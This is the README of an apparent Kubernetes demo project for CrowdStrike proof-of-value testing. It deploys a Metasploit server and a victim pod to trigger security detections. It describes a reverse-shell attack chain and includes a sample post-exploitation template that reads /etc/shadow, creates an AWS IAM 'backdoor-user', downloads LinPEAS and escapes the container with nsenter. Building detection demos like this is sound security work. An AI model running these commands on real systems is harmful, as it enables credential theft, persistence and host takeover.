CrowdStrike POV Demo Environment

A Kubernetes-based security demonstration environment designed for CrowdStrike Proof-of-Value (POV) testing with customers. This environment simulates sophisticated attack scenarios including container escape, cloud credential abuse, and malware execution to trigger comprehensive security detections.

🎯 Overview

This demo environment deploys containerized Metasploit Framework and victim containers to demonstrate:

• Bash reverse shell connections using TCP redirect for authentic attack signatures
• Container escape techniques using privileged containers
• AWS IAM credential abuse and backdoor creation
• Malware download and execution (LinPEAS, LSE, etc.)
• Data exfiltration simulation
• Complete attack chain automation with professional tooling

📁 Project Structure

pov-shellshock-main/
├── demo-auto.sh              # Main orchestration script
├── demo-scripts.yaml         # ConfigMap with attack scripts and payloads
├── demo-server.yaml          # Containerized Metasploit Framework server
├── demo-client.yaml          # Victim container with embedded connection scripts
└── README.md                 # This file

🚀 Quick Start

Prerequisites

• Kubernetes cluster with kubectl access
• CrowdStrike Falcon sensor deployed (for detection validation)
• kubectl configured for your target cluster

Basic Usage

1. Clone and navigate to the project:

   git clone https://github.com/kuhnskc/shellshock-container-demo.git
   cd shellshock-container-demo

2. Execute the demo:

   ./demo-auto.sh

3. Monitor CrowdStrike Falcon console for detections during the ~4-minute demo execution

4. Clean up (optional):

   kubectl delete -f demo-client.yaml -f demo-server.yaml -f demo-scripts.yaml

📋 Demo Flow

Phase 1: Infrastructure Deployment (30 seconds)

• Deploys ConfigMap with attack scripts
• Creates demo-server (Metasploit) and demo-client (victim) pods
• Waits for pod readiness

Phase 2: Framework Installation (3-4 minutes)

• Installs Metasploit Framework in demo-server container
• Installs system dependencies and tools
• Prepares attack environment

Phase 3: Attack Execution (2 minutes)

• Establishes Metasploit listener with AutoRunScript
• Triggers bash reverse shell connection using TCP redirect for realistic attack signatures
• Executes comprehensive post-exploitation commands automatically
• Performs container escape and host-level operations

Phase 4: Cleanup (10 seconds)

• Restarts victim pod to clean state
• Maintains attacker infrastructure for analysis

⚙️ Customizing Attack Commands

To modify the post-exploitation attack sequence, edit the post_exploit.template section in demo-scripts.yaml:

data:
  post_exploit.template: |
    # Network reconnaissance
    nslookup google.com
    ping -c 5 8.8.8.8

    # System enumeration
    cat /etc/shadow
    cat /etc/passwd
    ps -A
    netstat -anlp

    # AWS cloud operations
    aws sts get-caller-identity
    aws iam create-user --user-name backdoor-user
    aws s3 ls

    # Malware simulation
    wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
    ./lse.sh -l 1 -i -c

    # Container escape
    nsenter --target 1 --mount --uts --ipc --net --pid -- whoami

After making changes, redeploy the ConfigMap:

kubectl apply -f demo-scripts.yaml

⚠️ Disclaimer

This tool is not officially supported by CrowdStrike and is provided as-is for educational and authorized security testing purposes only. Use at your own risk and only in environments where you have explicit permission to conduct security testing.

Co-authored with Claude AI assistance.